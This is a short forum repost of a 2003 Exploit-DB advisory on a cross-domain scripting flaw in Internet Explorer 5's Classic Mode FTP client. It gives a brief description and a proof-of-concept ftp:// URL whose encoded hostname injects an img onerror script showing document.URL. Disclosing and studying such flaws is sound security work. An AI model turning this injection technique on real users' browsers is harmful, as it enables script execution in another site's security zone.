Exploit Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22728
Проверка EDB
  1. Пройдено
Автор
MATTHEW MURPHY
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2003-06-04
Код:
source: https://www.securityfocus.com/bid/7810/info

The Microsoft Internet Explorer FTP indexing implementation could allow script code to be executed in the security zone of another FTP site. This vulnerability only exists when Internet Explorer FTP is used in "Classic Mode".

Any script would be executed with the permissions of the user running Internet Explorer. 

ftp://%3cimg%20src%3d%22%22%20onerror%3d%22alert%28document%2eURL%29%22%3e.example.com/
 
Источник
www.exploit-db.com

Похожие темы